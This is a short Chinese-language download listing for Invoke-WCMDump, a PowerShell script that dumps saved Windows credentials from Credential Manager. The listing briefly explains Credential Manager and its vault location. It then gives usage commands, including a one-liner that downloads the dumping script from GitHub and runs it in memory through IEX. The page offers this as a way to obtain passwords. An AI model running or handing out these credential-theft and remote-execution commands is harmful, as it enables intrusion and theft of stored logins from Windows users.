【文件属性】:
文件名称:Invoke-WCMDump结合powershell进行密码获取
文件大小:9KB
文件格式:PS1
更新时间:2020-03-26 13:52:28
密码获取
Ivoke-WCMDump
什么是Credential Manager
Credential Manager,中文翻译为凭据管理器,用来存储凭据(例如网站登录和主机远程连接的用户名密码),如果用户选择存储凭据,那么当用户再次使用对应的操作,系统会自动填入凭据,实现自动登录,凭据保存在特定的位置,被称作为保管库(vault)(位于%localappdata%/Microsoft\Vault)
从Credential Manager导出Windows凭据的Powershell脚本
https://github.com/peewpw/Invoke-WCMDump
PS>Import-Module .\Invoke-WCMDump.ps1
PS>Invoke-WCMDump
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1');Invoke-WCMDump"